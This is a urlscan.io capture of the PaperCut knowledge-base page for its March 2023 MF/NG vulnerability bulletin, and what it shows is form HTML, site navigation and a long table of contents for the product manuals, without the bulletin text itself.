www.papercut.com
Open in
urlscan Pro
34.95.115.145
Public Scan
URL:
https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
Submission: On June 14 via api from US — Scanned from DE
Submission: On June 14 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
<form class="aa-Form" action="" novalidate="" role="search">
<div class="aa-InputWrapperPrefix"><label class="aa-Label" for="autocomplete-0-input" id="autocomplete-0-label"><button class="aa-SubmitButton" type="submit" title="Submit"><svg class="aa-SubmitIcon" viewBox="0 0 24 24" width="20" height="20"
fill="currentColor">
<path
d="M16.041 15.856c-0.034 0.026-0.067 0.055-0.099 0.087s-0.060 0.064-0.087 0.099c-1.258 1.213-2.969 1.958-4.855 1.958-1.933 0-3.682-0.782-4.95-2.050s-2.050-3.017-2.050-4.95 0.782-3.682 2.050-4.95 3.017-2.050 4.95-2.050 3.682 0.782 4.95 2.050 2.050 3.017 2.050 4.95c0 1.886-0.745 3.597-1.959 4.856zM21.707 20.293l-3.675-3.675c1.231-1.54 1.968-3.493 1.968-5.618 0-2.485-1.008-4.736-2.636-6.364s-3.879-2.636-6.364-2.636-4.736 1.008-6.364 2.636-2.636 3.879-2.636 6.364 1.008 4.736 2.636 6.364 3.879 2.636 6.364 2.636c2.125 0 4.078-0.737 5.618-1.968l3.675 3.675c0.391 0.391 1.024 0.391 1.414 0s0.391-1.024 0-1.414z">
</path>
</svg></button></label>
<div class="aa-LoadingIndicator" hidden=""><svg class="aa-LoadingIcon" viewBox="0 0 100 100" width="20" height="20">
<circle cx="50" cy="50" fill="none" r="35" stroke="currentColor" stroke-dasharray="164.93361431346415 56.97787143782138" stroke-width="6">
<animateTransform attributeName="transform" type="rotate" repeatCount="indefinite" dur="1s" values="0 50 50;90 50 50;180 50 50;360 50 50" keyTimes="0;0.40;0.65;1"></animateTransform>
</circle>
</svg></div>
</div>
<div class="aa-InputWrapper"><input class="aa-Input" aria-autocomplete="both" aria-labelledby="autocomplete-0-label" id="autocomplete-0-input" autocomplete="off" autocorrect="off" autocapitalize="off" enterkeyhint="search" spellcheck="false"
placeholder="" maxlength="512" type="search"></div>
<div class="aa-InputWrapperSuffix"><button class="aa-ClearButton" type="reset" title="Clear" hidden=""><svg class="aa-ClearIcon" viewBox="0 0 24 24" width="18" height="18" fill="currentColor">
<path
d="M5.293 6.707l5.293 5.293-5.293 5.293c-0.391 0.391-0.391 1.024 0 1.414s1.024 0.391 1.414 0l5.293-5.293 5.293 5.293c0.391 0.391 1.024 0.391 1.414 0s0.391-1.024 0-1.414l-5.293-5.293 5.293-5.293c0.391-0.391 0.391-1.024 0-1.414s-1.024-0.391-1.414 0l-5.293 5.293-5.293-5.293c-0.391-0.391-1.024-0.391-1.414 0s-0.391 1.024 0 1.414z">
</path>
</svg></button></div>
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/8186336/525b820a-c332-44a2-b743-cfacfa396ead
<form id="hsForm_525b820a-c332-44a2-b743-cfacfa396ead" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/8186336/525b820a-c332-44a2-b743-cfacfa396ead"
class="hs-form-private hsForm_525b820a-c332-44a2-b743-cfacfa396ead hs-form-525b820a-c332-44a2-b743-cfacfa396ead hs-form-525b820a-c332-44a2-b743-cfacfa396ead_98072deb-59e0-4c6b-b970-289804847cc9 hs-form stacked"
target="target_iframe_525b820a-c332-44a2-b743-cfacfa396ead" data-instance-id="98072deb-59e0-4c6b-b970-289804847cc9" data-form-id="525b820a-c332-44a2-b743-cfacfa396ead" data-portal-id="8186336"
data-test-id="hsForm_525b820a-c332-44a2-b743-cfacfa396ead">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-525b820a-c332-44a2-b743-cfacfa396ead" class="" placeholder="Enter your " for="email-525b820a-c332-44a2-b743-cfacfa396ead"><span></span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-525b820a-c332-44a2-b743-cfacfa396ead" name="email" required="" placeholder="Email*" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_braze_id hs-braze_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-braze_id-525b820a-c332-44a2-b743-cfacfa396ead" class="" placeholder="Enter your braze_id"
for="braze_id-525b820a-c332-44a2-b743-cfacfa396ead"><span>braze_id</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="braze_id" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_braze_device_id hs-braze_device_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-braze_device_id-525b820a-c332-44a2-b743-cfacfa396ead" class="" placeholder="Enter your braze_device_id"
for="braze_device_id-525b820a-c332-44a2-b743-cfacfa396ead"><span>braze_device_id</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="braze_device_id" class="hs-input" type="hidden" value=""></div>
</div>
<div class="legal-consent-container">
<div>
<div class="hs-dependent-field">
<div class="hs_LEGAL_CONSENT.subscription_type_20660050 hs-LEGAL_CONSENT.subscription_type_20660050 hs-fieldtype-booleancheckbox field hs-form-field">
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input">
<ul class="inputs-list" required="">
<li class="hs-form-booleancheckbox"><label for="LEGAL_CONSENT.subscription_type_20660050-525b820a-c332-44a2-b743-cfacfa396ead" class="hs-form-booleancheckbox-display"><input
id="LEGAL_CONSENT.subscription_type_20660050-525b820a-c332-44a2-b743-cfacfa396ead" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_20660050" value="true"><span>
<p>Yes, subscribe me to PaperCut news, offers, product updates, newsletters and events.</p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display: none;"></legend>
</div>
<div class="hs-richtext">
<p>By filling out and submitting this form, you agree that you have read our <a href="https://www.papercut.com/privacy-policy/" target="_blank">Privacy Policy</a>, and agree to PaperCut handling your data in accordance with its terms.</p>
</div>
</div>
<div class="hs_recaptcha hs-recaptcha field hs-form-field">
<div class="input">
<div class="grecaptcha-badge" data-style="inline" style="width: 256px; height: 60px; box-shadow: gray 0px 0px 5px;">
<div class="grecaptcha-logo"><iframe title="reCAPTCHA" width="256" height="60" role="presentation" name="a-xb7ya01x2h5d" frameborder="0" scrolling="no"
sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation"
src="https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6Ld_ad8ZAAAAAAqr0ePo1dUfAi0m4KPkCMQYwPPm&co=aHR0cHM6Ly93d3cucGFwZXJjdXQuY29tOjQ0Mw..&hl=en&v=TqxSU0dsOd2Q9IbI7CpFnJLD&size=invisible&badge=inline&cb=u6wgesuu5oi4"></iframe>
</div>
<div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
</div><iframe style="display: none;"></iframe>
</div><input type="hidden" name="g-recaptcha-response" id="hs-recaptcha-response" value="">
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1718392149067","formDefinitionUpdatedAt":"1717102548007","lang":"en","legalConsentOptions":"{\"communicationConsentCheckboxes\":[{\"communicationTypeId\":20660050,\"label\":\"<p>Yes, subscribe me to PaperCut news, offers, product updates, newsletters and events.</p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"<p>By filling out and submitting this form, you agree that you have read our <a href=\\\"https://www.papercut.com/privacy-policy/\\\" target=\\\"_blank\\\">Privacy Policy</a>, and agree to PaperCut handling your data in accordance with its terms.</p>\",\"processingConsentCheckboxLabel\":\"<p>Yes, subscribe me to PaperCut news, offers, product updates, newsletters and events.</p>\",\"isLegitimateInterest\":false}","embedType":"REGULAR","renderRawHtml":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36","pageTitle":"URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut | PaperCut","pageUrl":"https://www.papercut.com/kb/Main/PO-1216-and-PO-1219","isHubSpotCmsGeneratedPage":false,"hutk":"74a8b7474ef95d899c7e380e59a8bbfc","__hsfp":3598200494,"__hssc":"154692263.1.1718392149656","__hstc":"154692263.74a8b7474ef95d899c7e380e59a8bbfc.1718392149656.1718392149656.1718392149656.1","formTarget":"#hbspt-form-98072deb-59e0-4c6b-b970-289804847cc9","boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_20660050","rumScriptExecuteTime":637.7000007629395,"rumTotalRequestTime":908.7999992370605,"rumTotalRenderTime":950.2999992370605,"rumServiceResponseTime":271.0999984741211,"rumFormRenderTime":41.5,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1718392149663,"originalEmbedContext":{"portalId":"8186336","formId":"525b820a-c332-44a2-b743-cfacfa396ead","region":"na1","target":"#hbspt-form-98072deb-59e0-4c6b-b970-289804847cc9","isBuilder":false,"isTestPage":false,"isPreview":false,"isMobileResponsive":true},"correlationId":"98072deb-59e0-4c6b-b970-289804847cc9","renderedFieldsIds":["email","braze_id","braze_device_id","LEGAL_CONSENT.subscription_type_20660050"],"captchaStatus":"LOADED","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5387","sourceName":"forms-embed","sourceVersion":"1.5387","sourceVersionMajor":"1","sourceVersionMinor":"5387","allPageIds":{},"_debug_embedLogLines":[{"clientTimestamp":1718392149189,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut | PaperCut\",\"pageUrl\":\"https://www.papercut.com/kb/Main/PO-1216-and-PO-1219\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\",\"isHubSpotCmsGeneratedPage\":false}"},{"clientTimestamp":1718392149190,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1718392149661,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"74a8b7474ef95d899c7e380e59a8bbfc\"}"}]}"><iframe
name="target_iframe_525b820a-c332-44a2-b743-cfacfa396ead" style="display: none;"></iframe>
</form>Text Content
Hey there! We use cookies. They let us personalize content, track usage, and
analyze data on our end to improve your experience. To learn more about the
different cookies we’re using, check out our Privacy Policy.
If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.
Cookies settings
ACCEPT DECLINE
Skip to content
URGENT security message for all NG/MF customers
Language
Choose your language
* No results
* Global (English)
* Français (Français)
* España (Español)
* Deutschland (Deutsche)
* Suomi (Suomalainen)
* Italia (Italiano)
* Nederland (Nederlands)
* Portugal (Português)
* Россия (Pусский)
* Sverige (Svenska)
* Bolivia (Español)
* Brazil (Português)
* Colombia (Español)
* Ecuador (Español)
* El Salvador (Español)
* República Dominicana (Español)
* Guatemala (Español)
* Honduras (Español)
* Mexico (Español)
* Nicaragua (Español)
* Panamá (Español)
* Paraguay (Español)
* Peru (Español)
* Uruguay (Español)
* Venezuela (Español)
* 中国(简体中文)
* 台灣(繁體中文)
* 香港(繁體中文)
* 日本 (日本語)
* ประเทศไทย (ไทย)
Login
Choose your login
* No results
* PaperCut Hive
* PaperCut Pocket
* Partner Portal
* Students / Teachers
Support
Search
Software
Our products
* PaperCut MF
Powerful print management server for printers and MFDs
* PaperCut Hive
Complete cloud-native print management for business
* PaperCut NG
DIY print management server for everyone
* PaperCut Pocket
Cloud print management solution for businesses with simple needs
* Compare features
PaperCut Product Suite comparison
Free tools
* PaperCut Mobility Print
A free Google Cloud Print alternative
* PaperCut QRdoc
The power of digital documents – on paper
* PaperCut Views
Real-time print analytics, insights and forecasts
Sustainability
* PaperCut Grows
Grow your sustainability story.
In the percolator
* Projects in beta
Features in progress
Popular Features
* Print rooms
Track and manage all your printing activity
* Forest Positive Printing
Go further than waste reduction
* Print Deploy
Print queues made easy
* Microsoft Universal Print
Take control of your Universal Print environment
Speak with sales
Solutions
By industry
* High school / K-12
* Higher education
* Healthcare
* Local government
* Legal
* SMB
* Enterprise
* Coworking
* Life sciences
By topic
* Print security
* Reduce costs
* Reduce effort
* Improve user experience
* Hybrid work
By job type
* Sysadmin
* IT manager
* SMB Owner
What our customers say
“Sustainability is very important to Google nowadays,” says Ofer. “So the idea
that we could literally save paper on printing was appealing to us from the
get-go.”
Ofer Bar-Zakai, Google, US
* Customer Stories
100 million delighted users and counting. Read their stories
* Reviews
See what our customers say
Speak with sales
Resources
Discover everything we do
* Easy printing
We’ve simplified printing for you and your end-users
* Cloud and print
Review our full suite of management solutions for cloud
* Waste control
Explore why this should be important to everyone
* Scanning
We’ve made scanning easier and more secure
* Overview
Explore all our products, and find real-world examples
Popular Resources
* Grid® Report for Print Management | Spring 2024
* Complete Guide to Printing in Education
* Get Print Resiliency and Security Without Servers
* Securing Your Print System with PaperCut Whitepaper
* Find more
Reports, White Papers, Customer Stories, Ebooks and more
Click-through demos
* DemosNew!
Discover product features with interactive, self-guided walkthroughs
Have a read
* Blog
Read our latest news in tech, product updates, and more
Support
* Overview
* Help Center
* Manuals
* Knowledge base
* Known issues
* FAQs
Speak with sales
Software
Our products
* PaperCut MF
Powerful print management server for printers and MFDs
* PaperCut Hive
Complete cloud-native print management for business
* PaperCut NG
DIY print management server for everyone
* PaperCut Pocket
Cloud print management solution for businesses with simple needs
* Compare features
PaperCut Product Suite comparison
Free tools
* PaperCut Mobility Print
A free Google Cloud Print alternative
* PaperCut QRdoc
The power of digital documents – on paper
* PaperCut Views
Real-time print analytics, insights and forecasts
Sustainability
* PaperCut Grows
Grow your sustainability story.
In the percolator
* Projects in beta
Features in progress
Popular Features
* Print rooms
Track and manage all your printing activity
* Forest Positive Printing
Go further than waste reduction
* Print Deploy
Print queues made easy
* Microsoft Universal Print
Take control of your Universal Print environment
Speak with sales
Solutions
By industry
* High school / K-12
* Higher education
* Healthcare
* Local government
* Legal
* SMB
* Enterprise
* Coworking
* Life sciences
By topic
* Print security
* Reduce costs
* Reduce effort
* Improve user experience
* Hybrid work
By job type
* Sysadmin
* IT manager
* SMB Owner
What our customers say
“Sustainability is very important to Google nowadays,” says Ofer. “So the idea
that we could literally save paper on printing was appealing to us from the
get-go.”
Ofer Bar-Zakai, Google, US
* Customer Stories
100 million delighted users and counting. Read their stories
* Reviews
See what our customers say
Speak with sales
Resources
Discover everything we do
* Easy printing
We’ve simplified printing for you and your end-users
* Cloud and print
Review our full suite of management solutions for cloud
* Waste control
Explore why this should be important to everyone
* Scanning
We’ve made scanning easier and more secure
* Overview
Explore all our products, and find real-world examples
Popular Resources
* Grid® Report for Print Management | Spring 2024
* Complete Guide to Printing in Education
* Get Print Resiliency and Security Without Servers
* Securing Your Print System with PaperCut Whitepaper
* Find more
Reports, White Papers, Customer Stories, Ebooks and more
Click-through demos
* DemosNew!
Discover product features with interactive, self-guided walkthroughs
Have a read
* Blog
Read our latest news in tech, product updates, and more
Support
* Overview
* Help Center
* Manuals
* Knowledge base
* Known issues
* FAQs
Speak with sales
CONTACT SALES
* Home
* ›
* Kb
* ›
* Main
* ›
* PO 1216 and PO 1219
* Help Center home
* Product manuals
* PaperCut NG and MF manual
* Overview
* How does PaperCut NG/MF work?
* Example user information sheets
* Example 1: Printing with the popup confirmation window
* Example 2: Printing with shared accounts (for staff)
* Example 3: Printing using a Release Station
* Example 4: Refunding a print job (for staff)
* Example 5: Adding credit using a TopUp/Pre-Paid Card
* Example 6: Printing from a wireless network or laptop (Web Print)
* About This Guide
* Prerequisites
* Terminology used in this document
* Licensing & subscriptions
* Terminology
* Important points - PaperCut MF licensing
* How PaperCut MF works with entitlements
* Managing entitlements
* Activating/renewing a subscription
* Installing a license
* When subscriptions expire
* When PaperCut MF is offline
* Troubleshooting licensing
* End User License Agreement (EULA)
* Installation
* Implementation by example
* Scenario: The small school
* Scenario: The large school
* Scenario: The university
* Scenario: The small business
* Scenario: The medium to large business
* Scenario: The public library or Internet cafe/kiosk
* Capacity planning
* Database sizing and growth
* Print archives sizing and growth
* Network bandwidth planning
* Manage large client billing databases
* Installation on Windows
* Quick install: Windows
* Running in a Workgroup environment
* Option 1: Common username and passwords on all systems
* Option 2: Authenticating via popup
* Installation on Mac
* Quick install: Apple Mac
* Mac printing in detail
* Mac hosted print queues
* Windows hosted print queues
* Installation on Linux (CUPS and Samba)
* Quick install: Linux (CUPS and/or Samba)
* PaperCut NG/MF on Linux
* The installation process
* Advanced configuration & logs
* Backups & system management
* User directory and authentication
* Unix command-line Release Station client
* Remove PaperCut NG/MF from a Linux server
* Linux FAQ
* Installation on Novell OES Linux (iPrint)
* Testing the installation
* Advanced implementation
* Multi-Server and Multi-Site Deployments
* Resiliency with Site Servers
* Technical overview
* Offline operations
* Install a Site Server
* Common questions about Site Servers
* Configuring secondary print servers and locally attached printers
* Configure a Windows secondary print server
* Configure a Macintosh secondary print server
* Configure a Linux or Novell iPrint secondary print server
* Print monitoring architecture
* Multiple print servers
* Automating secondary server deployment on Windows
* Configuring Direct Printing
* Install the Direct Print Monitor
* Install the Direct Print Monitor on Windows computers
* Install the Direct Print Monitor on a Macintosh computer
* Install the Direct Print Monitor on a Linux computer
* Link direct print queues to a printer
* View linked print queues
* Link a print queue to a printer
* Unlink a print queue from a printer
* Configure a directly connected printer
* Configure Find-Me Printing for directly connected printers
* Clustering and high availability
* Application Server failover
* Microsoft Failover Cluster Manager (MSFCM) on Windows server
2012/2016
* Microsoft Cluster Server (MSCS) on Windows
* Virtual Machine clustering
* Veritas Cluster Server (VCS) on Windows
* Novell Cluster Services (NCS) on Novell OES Linux
* PaperCut User Client configuration
* Deployment on an external database (RDBMS)
* Upsize to an external RDBMS
* Configuring Microsoft SQL Express
* Configuring Microsoft SQL Server
* Configuring MySQL
* Configuring Oracle (and Oracle Express Edition)
* Configuring Azure SQL
* Web browser Single Sign-on (SSO)
* Plan for web SSO Implementation
* Configure web SSO
* Print authentication
* About authentication and printing
* Handling unauthenticated (non-domain) laptops
* The authentication cookbook - recipes by example
* PaperCut LPD service
* The PaperCut LPD service
* User Client
* Install the User Client on Windows
* Install the User Client with Microsoft Intune
* Install the User Client on macOS
* Install the User Client on Linux and Unix
* Tour
* Navigation
* Menu
* Basic user operations
* Basic printer operations
* Client software
* Interface levels
* Assigning administrator level access
* Charting, statistics, reports, and logs
* Configuration
* Services for Users
* User Client
* User web interface - original
* User web interface - new
* Environmental Dashboard / Windows Live Tiles
* Using the Environmental Dashboard
* Windows Live Tile installation
* Mobile User web interface
* Web widgets
* User management
* Group management
* Creating internal groups
* Set new user creation rules
* Set up quota allocations
* Set overdraft limits
* Enable username aliasing
* Add/update username aliases
* Maintain office/department history
* Disable printing for a user
* User Card/ID Numbers
* User Card/ID Number overview
* Synchronize Card/ID Numbers from a directory
* Automatically generate Card/ID Numbers
* Self-management of Card/ID Numbers
* Batch importing and managing Card/ID Numbers
* Card/ID Number Self-Association at the MFD
* External Database for Card/ID Numbers
* Card/ID Number and Card Reader FAQ
* Bulk user operations
* Batch import and update user data
* User management FAQs
* Guest and anonymous user management
* Internal users (users managed by PaperCut NG/MF)
* Anonymous guest printing
* Multiple personal accounts
* Why use multiple personal accounts?
* Configure multiple personal accounts
* Configuration examples
* Shared accounts
* Create a shared account
* Shared account naming guidelines
* Search for a shared account
* Batch import and update shared accounts
* Synchronize shared accounts with external source
* Bulk shared account operations
* Allocate a shared account quota
* Apply a cost multiplier to a shared account
* Customize shared accounts
* Grant access to shared accounts
* Account selection
* Account selection in non-domain environments (Workgroups)
* Printer management
* Add and remove/delete/ignore printers
* The template printer
* Copy printer settings
* Rename a printer
* Disable printers with time latches
* Set up differential charging
* Convert or block print jobs - filters and restrictions
* Manage printer groups
* Define cost adjustments
* Popup authentication
* Set the color detection method
* Switch to using SNMPv3
* Validate page counts using hardware checks
* Watermarking/job annotation
* Behavior on server connection failures
* Toner Levels (for supported printers)
* Refund print jobs
* Define custom printer fields
* Extract usernames in enterprise print environments (e.g. SAP,
Unix)
* Printer FAQs
* Find-Me printing and printer load balancing
* Find-Me printing
* Global Print Driver
* Requirements for job redirection (load balancing or Find-Me
printing)
* Advanced configuration
* Printer load balancing
* Find-Me printing and printer load balancing FAQ
* Secure print release
* Release Station interfaces
* Hold/release usage scenarios
* Install a Release Station
* Install a Release Station on Windows
* Install a Release Station on a Mac
* Configure a Release Station
* Secure print jobs at the printer while they're waiting to be
printed
* Prevent jobs being released when a printer/device is in error
* Prevent jobs being released from an MFD Release Station when a
device is in error
* Prevent jobs being released from a Standard Release Station
when a printer is in error
* Prevent jobs being released from a web-based Release Station
when a printer is in error
* Frequently Asked Questions: Prevent jobs being released when a
printer is in error
* Configure mobile print release
* Copier integration
* Overview
* Setup
* Device List and statuses
* Manage copiers
* Authentication methods
* About filters and restrictions
* Advanced configuration
* Release Stations and Find Me Printing
* Configure Secure Print Release
* Configure Secure Print Release with Find-Me printing
* Configure Secure Print Release with load balancing
* Configure Secure Print Release to support multiple operating
systems
* Allocating accounts to print jobs at the device
* System requirements PaperCut MF
* Configure the ability to allocate accounts to print jobs at
the device
* Changing attributes of print jobs at the device
* System requirements PaperCut MF
* Configure the ability to change attributes of print jobs at
the device
* Frequently Asked Questions
* Viewing attributes of print jobs at the device
* System requirements
* Configure the ability to view attributes of print jobs at
the device
* Frequently Asked Questions
* Prevent jobs from being released from an MFD Release Station
when a device is in error
* Frequently Asked Questions: Prevent jobs being released when a
printer is in error
* Integrated Scanning
* Integrated Scanning overview
* What is Integrated Scanning?
* Integrated Scanning at the MFD
* Scan PDF compression
* Scan to Fax explained
* Document Processing for Scans
* PaperCut MF Cloud Services
* Example Integrated Scanning implementations
* Setting up Integrated Scanning
* Prepare for Integrated Scanning implementation
* Configure Integrated Scanning / scan actions
* Configure Integrated Scanning notifications
* Enable Advanced Scan to Fax actions
* Configure advanced Integrated Scanning (config keys)
* Set up self-hosted Document Processing
* Substitution variables/macros
* Capturing scan metadata using Interactive Scan Destinations
* Troubleshooting Integrated Scanning
* Troubleshooting Scan to Cloud Storage
* Troubleshooting Document Processing scans, including OCR
* Integration with Electronic Document Management Systems
* Integrated Scanning FAQs
* Mobile & BYOD printing
* Mobility Print
* Print Deploy (deploy print queues and drivers)
* Universal Print
* Email to Print
* Web Print (driver-less printing via a web browser)
* Set up Web Print
* Set up Web Print: Default mode
* Set up Web Print: Sandbox mode
* Enable Web Print on a printer
* Modify default Web Print settings (optional)
* Create a Web Print printer map or custom printer list
(optional)
* Advanced Web Print configuration (optional)
* Submit a Web Print job
* Scaling your Web Print environment
* Add or remove a Web Print server
* Monitor a Web Print server
* Troubleshooting Web Print problems
* Mobile Print Release-releasing print jobs on your mobile
* Mobile web client
* Self association for emails and email verification/validation
* TopUp/Pre-Paid Cards
* The card system
* Create new cards
* Redeem a card
* Reports
* Report types
* Report formats
* Generate filtered reports
* Create custom reports
* Schedule and email reports
* Export usage data from PaperCut NG/MF to a 3rd party tool
* Advanced reporting options
* Central Reports
* Prerequisites for Central Reports
* Set up Central Reports
* Run Central Reports
* Print Scripting (advanced feature)
* Creating print scripts
* Print script API reference
* Troubleshooting print scripts
* Tips for print scripts
*
* Device Scripting (advanced feature)
* Creating device scripts
* Device script API reference
* Device scripting examples
* Example: Set a daily color copying quota for all users
* Example: Prevent access to devices out of business hours
* Example: Discount the copying price for students during
off-peak hours and for staff at all times
* Troubleshooting device scripts
* Tips for device scripting
* Security (for advanced features)
* Print, device, and other advanced scripting
* Using extended Java classes in scripts
* Customization
* Customize the Login page
* Customize the Forgot Login Details page
* Customize the Admin web interface
* Customize the User web interface
* Customize the User Client
* Customize Mobile Print Release
* Customize report headers
* Limit the list of interface languages/translations
* Data access and custom reports
* Automation and scripting
* Custom user directory information providers
* Enable ports 80 (HTTP) and 443 (HTTPS)
* Web Cashier
* Set up Web Cashier
* Assign Web Cashier admin permissions
* Process purchases
* Deposit funds in a Web Cashier account
* View Web Cashier order history
* Customize the Web Cashier interface text
* Generate a Web Cashier report
* Advanced: Apply a regular expression to convert a card number
* Job Ticketing
* Print Archiving (viewing and content capture)
* Technical overview: How does archiving work?
* Set up Print Archiving
* Advanced archiving options and features
* Troubleshooting and known limitations
* Administration
* System management
* The dashboard
* Synchronize user and group details
* With Active Directory
* Synchronize users from multiple Active Directory domains
* Prevent username clashes in Windows multi-domain
environments
* With LDAP
* Advanced LDAP Configuration
* LDAP server default configuration
* With Microsoft Entra ID
* Synchronize user and group details with standard Entra ID
* Preparing to use UPN usernames when syncing with the
standard Entra ID sync method
* Entra ID Multifactor Authentication Requirements
* Synchronize user and group details with Entra ID Secure
LDAP
* With Google Cloud Directory
* Google Cloud Directory Group Names
* Synchronize users from multiple Google Cloud Directory
domains
* Google Cloud Directory: Education scenario
* Google Cloud Directory: FAQs
* With custom programs (advanced feature)
* Manually synchronize with a user directory
* Create users on demand
* Troubleshooting User/Group Sync
* Active Directory Sync Issues
* LDAP Sync Issues
* Google Cloud Directory Sync Issues
* Microsoft Entra ID Sync Issues
* Assign administrator level access
* Set up system notifications and emails
* Configure email
* Configure an SMTP server for Office 365 or Microsoft 365 (*
Deprecated)
* Configure an SMTP server for Office 365 or Microsoft 365
Over OAuth2
* Configure an SMTP server for Google Workspace (*
Deprecated)
* Configure an SMTP server for Gmail Over OAuth2
* Configure an SMTP server for Gmail, Yahoo, or Outlook.com
* Configure a custom SMTP server
* Troubleshooting SMTP/Email Notifications
* Configure system notifications
* Manage system backups
* Set system security options
* Change the Application Server ports
* Configure how the Print Provider communicate over HTTPS
* Enforce HTTPS communication
* Restrict access to the Application Server
* Change the web session inactivity timeout
* Change the CSRF validation security properties
* Change the environmental impact reference values
* Set privacy options
* Using the Advanced Config Editor
* Add third-party integrations
* Logging
* Temp folder cleanup
* Server management
* Change the server address
* Change the network interface that PaperCut listens on
* Override the "Host" header for redirects
* Temp folder cleanup
* Tools - database, server-command scripting, and APIs (Advanced)
* Server commands (server-command)
* Database tool (db-tools)
* The XML Web Services API
* Generate SSL/HTTPS keys
* Use the PaperCut NG/MF self-signed certificate
* Use a trusted certificate
* Purchase and install a new trusted certificate
* Use an existing trusted PaperCut NG/MF certificate
* Use an existing trusted IIS certificate
* Renew an SSL certificate
* Advanced customization
* Troubleshoot SSL/HTTPS key generation
* Configure the User Client using the command-line
* Stop and start the Application Server
* Automate installation on Windows
* Import print job details
* Monitor print system health
* PaperCut system health monitoring overview
* Examples: Monitoring system health
* Example 1: Overall print system health monitoring
* Example 2: Printer health monitoring
* Example 3: Advanced system health monitoring
* Configure PaperCut NG/MF system health monitoring
* Discover the System Health interface authorization key
* Discover the printer and device status URLs
* System Health interface reference
* Status summary URLs
* Status per printer and per device URLs
* Status per Web Print application
* Advanced system statistics URLs
* Advanced system information URLs
* PDL transform language
* Upgrading
* Upgrade MF/NG from a previous version (upgrade steps)
* Troubleshooting upgrade issues
* (Legacy) Upgrade from PaperCut ChargeBack
* (Legacy) Upgrade from PaperCut Quota
* Troubleshooting & technical FAQs
* PaperCut Hive and Pocket manual
* Product & features overview
* Print Security
* Secure print release
* Access Control
* Job timeout & deletion
* Printer error alerts
* Print job thumbnails
* Watermarks & digital signatures
* Reduce Waste
* 2-sided printing
* Black & white printing
* More cost saving tips
* Easy Printing
* User signup process / welcome emails
* Printer discovery
* Mobile & tablet printing
* Print tracking
* Low toner alerts
* Printer labels/NFC stickers
* Print offline
* Integrated Scanning
* Data center locations
* How it works
* Edge Mesh and edge nodes
* Security considerations
* Printer discovery
* Authentication
* Plan & get started
* System requirements
* Supported printers
* Planning your install
* Multifunction device deployment checklist
* Set up local language
* Bulk deploy PaperCut software to users
* Deployment with Microsoft Intune (Windows)
* Deployment with Microsoft Intune (macOS)
* Deployment with MS EndPoint Manager
* Deployment with Jamf
* Deployment with JumpCloud (Windows)
* Deployment with JumpCloud (macOS)
* Deployment with Microsoft Group Policy
* Deployment with ManageEngine Endpoint Central (Windows)
* Deployment to ChromeOS
* Deployment with Kandji (macOS)
* Network environments
* Onsite - no firewall port restrictions
* Onsite - multi-site with WAN connection
* Onsite - multi-site with no WAN connection
* Onsite - multi-subnet restricted network
* Off network - remote printing
* Manage your print environment
* Managing users
* Users
* Administrators
* Access codes & access cards
* Managing printers
* Adding, removing or updating printers
* Choosing the print job delivery method
* Publishing or unpublishing printers
* Renaming a printer
* Changing a printer's IP address
* Printing printer labels
* Installing printer apps
* Print job finishing options (stapling units)
* Managing deployed print queues
* Preparing a print queue and driver
* Deploying your queue and driver
* How it works
* Technical and security details
* FAQs
* Managing your Edge Mesh
* Best practices for super nodes
* Reports and insights
* Logs and Story Tree
* Configure features
* Print Security
* Control access to printers/MFDs
* Secure print release
* Delete print jobs automatically
* Alert users about printer errors
* Use watermarking and digital signatures
* Set thumbnail visibility privacy
* Reduce Waste
* 2-sided printing
* Black and white printing
* More cost saving tips
* Easy Printing
* User signup process
* Printer discovery
* Printer labels
* Mobile & tablet printing
* Print tracking
* Low toner alerts
* Offline printing
* Integrated Scanning
